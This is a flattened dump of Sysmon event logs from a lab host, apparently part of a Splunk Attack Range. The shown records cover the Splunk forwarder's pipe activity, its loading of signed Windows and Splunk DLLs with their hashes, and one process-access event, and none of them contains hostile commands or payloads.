18141800x80000000000000001531063Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531062Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531061Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531060Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 18141800x80000000000000001531059Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 17141700x80000000000000001531058Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreatePipe2021-04-21 17:30:31.971{21761711-842A-607D-9700-00000000BB01}3716<Anonymous Pipe>C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe 534500x80000000000000001531057Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001531056Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValid 734700x80000000000000001531055Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbgcore.dll10.0.14321.1024 (debuggers(dbg).210127-1811)Windows Core Debugging HelpersMicrosoft® Windows® Operating SystemMicrosoftDBGCORE.DLLMD5=72E8FEC8419AB470FB737883463688FE,SHA256=1DA7D2D2D1C4E6EC17101A4997C4AA610818730D63C72C1D2084ABA3F25C5146trueMicrosoft WindowsValid 734700x80000000000000001531054Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.439{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dbghelp.dll10.0.14321.1024 (rs1_release.160715-1616)Windows Image HelperMicrosoft® Windows® Operating SystemMicrosoftDBGHELP.DLLMD5=2C92DF5D32661FB4B81B08B72B2102A7,SHA256=BCEF4DEBDE7D8D6916EE3D3E5E63A725E03A058AABCD7DD49DF9D48B16E96D1AtrueMicrosoft WindowsValid 734700x80000000000000001531053Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=51FCB0FDEFCB9A3E4A1DC8C8673BC63C,SHA256=63A0E1A76B7ABCF56E44B548568649FFB6B5609402746D48A4DC77CCED20F5FEtrueMicrosoft WindowsValid 734700x80000000000000001531052Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rsaenh.dll10.0.14393.2969 (rs1_release.190503-1820)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=B6E99FD898E948657373BB02708C7C00,SHA256=90476029BD7AB0FEC53AAE567AE53BC0B09C7C5C8C7B8F19485BA872B74ED591trueMicrosoft WindowsValid 734700x80000000000000001531051Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\cryptsp.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=9500AE4C4B639FEAEED0CC6C39F45149,SHA256=C1055D4B9A854282336A5404CA0FCB1A2EBC3417600035338C9CDFC7B8D0778CtrueMicrosoft WindowsValid 18141800x80000000000000001531050Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820\srvsvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001531049Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=656F846CAED76C6FC5C76E8BACEF4EF6,SHA256=DFDE27C086764ACC1EA3E6A4E2BA50C2AB532F9E1D99203861F51910A8D850FBtrueMicrosoft WindowsValid 18141800x80000000000000001531048Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-ConnectPipe2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820\wkssvcC:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe 734700x80000000000000001531047Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcrypt.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=51F4F9025E6D236F5BF2C24C09E42C8E,SHA256=AE196933C3E292680C83B09F24CE9E6D498E34ECDD30ACB8C1544EEB4705F285trueMicrosoft WindowsValid 734700x80000000000000001531046Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\wkscli.dll10.0.14393.0 (rs1_release.160715-1616)Workstation Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWKSCLI.DLLMD5=3DCBAE237E4E1F0EBE8E7DC053F778C4,SHA256=C3331CCBE71CC98A5F1BC013F1C0218FE194CA7B497DDF706BF9025AB5A7B330trueMicrosoft WindowsValid 734700x80000000000000001531045Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=504739A17F3A05531258784275A6F375,SHA256=A931C54C47B454407990241DB12BD209AC219C55F026ADDED427A9E84A409923trueMicrosoft WindowsValid 734700x80000000000000001531044Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\netapi32.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNetApi32.DLLMD5=F55166956AEAD05A141BA7E80B90AB7B,SHA256=B9BCF21D7F7E771C388C469B2611E8946166C62005B56D72421060DABFF7093FtrueMicrosoft WindowsValid 734700x80000000000000001531043Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sspicli.dll10.0.14393.2580 (rs1_release_inmarket.181009-1745)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsspicli.dllMD5=5061339CE61C0B32DB8F51A95E3B2422,SHA256=60558CA374334D4C6BBAD475921538C14A9FF3422893348A0503C1F33015FD25trueMicrosoft WindowsValid 734700x80000000000000001531042Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\msvcp140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationmsvcp140.dllMD5=BA72C2F6F465926980ADC2FB7F8B3490,SHA256=86881A7054532019291C162F0A8177980C1C2B45490F7E88543F22915D08D9FFtrueMicrosoft CorporationValid 734700x80000000000000001531041Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValid 734700x80000000000000001531040Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\oleaut32.dll10.0.14393.4225 (rs1_release.210127-1811)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=BB3CFF02CD7B7C5704A3E8C77DC0C199,SHA256=016E4F1366708D0F7AD7017CDFCACBDC770C972B63E579EE9A20A98CD3301931trueMicrosoft WindowsValid 734700x80000000000000001531039Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4046 (rs1_release.201028-1803)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=E92A3F429653A81E4C53A0B474A817A5,SHA256=4ECAFDB8F0F20BFFC1A5516882FD59C961DEACC2B01F669ABF1D1895F6F90A55trueMicrosoft WindowsValid 734700x80000000000000001531038Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\Wldap32.dll10.0.14393.3269 (rs1_release.190929-1234)Win32 LDAP API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationWLDAP32.DLLMD5=12D6C3E8AC705BB42D377C05714F551C,SHA256=E67F6DB96F062A319312C365F1F55B2B38B0F90B77FFDA2522418709CBA45EB3trueMicrosoft WindowsValid 734700x80000000000000001531037Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\vcruntime140.dll14.16.27012.6 built by: vcwrkspcMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140.dllMD5=0C583614EB8FFB4C8C2D9E9880220F1D,SHA256=6CADB4FEF773C23B511ACC8B715A084815C6E41DD8C694BC70090A97B3B03FB9trueMicrosoft CorporationValid 734700x80000000000000001531036Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.307{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\combase.dll10.0.14393.4350 (rs1_release.210407-2154)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=88632FDECDE467B887C3594BE2EC545C,SHA256=FFED4D80961917C785063411ED15CED1DB6588AD925E76D72E1BF684FFDBF25DtrueMicrosoft WindowsValid 734700x80000000000000001531035Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\adsldpc.dll10.0.14393.0 (rs1_release.160715-1616)ADs LDAP Provider C DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationadsldpcMD5=F03FD7F523CFDBB96B0F3B8012FC161D,SHA256=8218E5AC2D7A52A2D50CD8D3CC8AA8CE4E37D1BDECFA62BC2637AA32A01CBA54trueMicrosoft WindowsValid 734700x80000000000000001531034Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ole32.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=676B0A1FB2A01D19AECB1F19883B6FC4,SHA256=56DEB219840DBAF9DAF645AD5D79AF9AB05F20E688382854DD487F440B257552trueMicrosoft WindowsValid 734700x80000000000000001531033Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\archive.dll-----MD5=98978F08A7A0D24C92FE8DC5287A8258,SHA256=CBB940A38E834C0BE44884C667863F76D6700D564043F90B3EB813370C3174E7trueSplunk, Inc.Valid 734700x80000000000000001531032Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32full.dll10.0.14393.4350 (rs1_release.210407-2154)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=F9FE858A976B6D38FD5CEA46019B246A,SHA256=37F7417D0AA2A15121A14CF176F0C4A1B6BB01E290324CCA0DDB001F47E8C458trueMicrosoft WindowsValid 734700x80000000000000001531031Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libeay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/libeay32.dllMD5=6445BD4247E3956B244772F3C415585F,SHA256=2B08FC9E160AD0F698226DA3E30A12551E8EBCCA1E7287E3915EC62B58151A78trueSplunk, Inc.Valid 734700x80000000000000001531030Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec-openssl.dll-----MD5=F30BB43EC30BE50400780223450492CD,SHA256=867D0453E285A5C29A4EFA039D2399662DCCAC98F88C46B0A41CEFB6B68DD836trueSplunk, Inc.Valid 734700x80000000000000001531029Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxmlsec.dll-----MD5=D98BAB348C28C8CFCC11EDB575E2557A,SHA256=ADA3F1256B175ECC390F126D2730D7A1AAB5A53F1AF205A7667D8010416602F9trueSplunk, Inc.Valid 734700x80000000000000001531028Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.306{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=551D603CEC947F586DB9FADEF4D2EBA6,SHA256=143125EFF9F3BC5B3F3BE505F3C3814393807B9CACB6AA5F75D39C77EC0D4ED8trueMicrosoft WindowsValid 734700x80000000000000001531027Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\ssleay32.dll1.0.2tOpenSSL Shared LibraryThe OpenSSL ToolkitThe OpenSSL Project, http://www.openssl.org/ssleay32.dllMD5=B20FA07A7A61791EE537B5945429E141,SHA256=EF53BC2AB58BC548EFA249B0B8F2E1FBB9D4739EF27B0C67DFF1468D555329D3trueSplunk, Inc.Valid 734700x80000000000000001531026Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValid 734700x80000000000000001531025Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=6A40F9C63B52CB4E8271CF3418618033,SHA256=A2BE23DA7AADFA9118130C939CD59D86E590957172FF404511EE6C5EC5147F15trueMicrosoft WindowsValid 734700x80000000000000001531024Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxslt.dll-----MD5=B8D3119CE62331C6A9B170DA0A608F28,SHA256=7D6C6B7C542B4E67AA468FEB12044E2EE34CE8F8A68C7665D7861F3363B6E66AtrueSplunk, Inc.Valid 734700x80000000000000001531023Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Program Files\SplunkUniversalForwarder\bin\libxml2.dll2.9.9libxml2 librarylibxml2-libxml2.dllMD5=0E7B7B3B25A2F094EB3A7BAF471154B8,SHA256=6CFAC8D8D5B7345F2C6CC82CBF8F9DD475881EA260346BE283E52B822F2CCAC1trueSplunk, Inc.Valid 734700x80000000000000001531022Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\nsi.dll10.0.14393.3297 (rs1_release_1.191001-1045)NSI User-mode interface DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationnsi.dllMD5=994E2A6D2A0B38E0968B3998E42033AC,SHA256=491F2D1DE09C39B324BCF5800198AC7CCE755F4023F1FEB3854D33716461BC27trueMicrosoft WindowsValid 734700x80000000000000001531021Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\user32.dll10.0.14393.4169 (rs1_release.210107-1130)Multi-User Windows USER API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationuser32MD5=883B59C5557E8A9B3C1E1ED1CA48CD5A,SHA256=271800C20A96587265BF83DE2EFC11329EEB2B6C0D57E5E0BCD137FB96BFE6E3trueMicrosoft WindowsValid 734700x80000000000000001531020Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\activeds.dll10.0.14393.4169 (rs1_release.210107-1130)ADs Router Layer DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationADsMD5=C62947CD1080E3B128B517AE91B22D6D,SHA256=6BB5D8967F822B5B1646DC9069212914D36C4D3D65E086AC0890B6A02112B438trueMicrosoft WindowsValid 734700x80000000000000001531019Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\IPHLPAPI.DLL10.0.14393.2339 (rs1_release_inmarket.180611-1502)IP Helper APIMicrosoft® Windows® Operating SystemMicrosoft Corporationiphlpapi.dllMD5=3CD38EDF9CA12F91131EDEE32D1C9DF5,SHA256=AF2440640BF8BDEAAF0DECDD7C354158E415ED0AA340ABA7A6CCCDC09C1E728BtrueMicrosoft WindowsValid 734700x80000000000000001531018Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.305{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\dnsapi.dll10.0.14393.4350 (rs1_release.210407-2154)DNS Client API DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationdnsapiMD5=D7651F99299B13D576A72643BFC44944,SHA256=589302E630C473DBDF4CE92C59F00B029FCA0C228E7111A764166E16025FA1A9trueMicrosoft WindowsValid 734700x80000000000000001531017Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.304{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\msvcrt.dll7.0.14393.2457 (rs1_release_inmarket.180822-1743)Windows NT CRT DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcrt.dllMD5=0AF8989DD67A135B536CF948E3EFB7EB,SHA256=C693DA0EF4DCF3BC244661B9FD280FE12C3053FDD7B977712C0CF210831B2EF4trueMicrosoft WindowsValid 734700x80000000000000001531016Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.304{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\secur32.dll10.0.14393.2273 (rs1_release_1.180427-1811)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecur32.dllMD5=BCF1B2F76F8A3A3E9E8F4D4322954651,SHA256=46B327CD50E728CBC22BD80F39DCEF2789AB780C77B6D285EEB90126B06EEEB5trueMicrosoft WindowsValid 734700x80000000000000001531015Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.304{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\advapi32.dll10.0.14393.2969 (rs1_release.190503-1820)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=F5442C4B9A99C3AED71BED79AC46DAD1,SHA256=05F47403F3BD93FB11F39A5CB4D6E4DD08B35FF4FA3D4969D8E5396D38FB484BtrueMicrosoft WindowsValid 734700x80000000000000001531014Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.304{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\rpcrt4.dll10.0.14393.4350 (rs1_release.210407-2154)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=BC930981DA6E598A6A2E87D8355CB38A,SHA256=34DB9A305C0574B5C1694A499221B520DFB2BFD894D8E95096ABF09F1182D758trueMicrosoft WindowsValid 734700x80000000000000001531013Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.303{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\sechost.dll10.0.14393.3808 (rs1_release.200707-2105)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=E6B98644CD3B912C44C39CC0996790A9,SHA256=23BE56E1B8DBA449C0959753175BD15457EC88E93E9E8B86489266347959A6F2trueMicrosoft WindowsValid 734700x80000000000000001531012Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.303{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=06E82905620845A7C185BDEE85CC4140,SHA256=B75C9B080293F85568912BABE749F403144959206F9C6BAB36B628E8F77C5DA0trueMicrosoft WindowsValid 10341000x80000000000000001531011Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.303{21761711-842B-607D-9B00-00000000BB01}31683556C:\Windows\system32\conhost.exe{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x80000000000000001531010Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.302{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\KernelBase.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationKernelbase.dllMD5=0F627827D9CFFA8E0BCF30F013FB7209,SHA256=EA47C3E471801ACA92EE449C66CF785EA670ADE92A5A2D5CDB81C93DD72ABEF0trueMicrosoft WindowsValid 734700x80000000000000001531009Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.302{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\kernel32.dll10.0.14393.4350 (rs1_release.210407-2154)Windows NT BASE API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel32MD5=A5AD62615D2361BFAEC6C047B199184C,SHA256=B43F3DFDAF7BAA7A2B97015631F96CE429C50348D380080CFC29C36F959D7886trueMicrosoft WindowsValid 734700x80000000000000001531008Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:31.301{21761711-6137-6080-C05D-00000000BB01}5820C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exeC:\Windows\System32\ntdll.dll10.0.14393.4350 (rs1_release.210407-2154)NT Layer DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationntdll.dllMD5=4C8F6DF16BD8E2739EC0D3439EA7507C,SHA256=79E203951A298D2818A9484A56521FA70DF19B7053F704378375128C7C48E8EEtrueMicrosoft WindowsValid 734700x80000000000000001531007Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 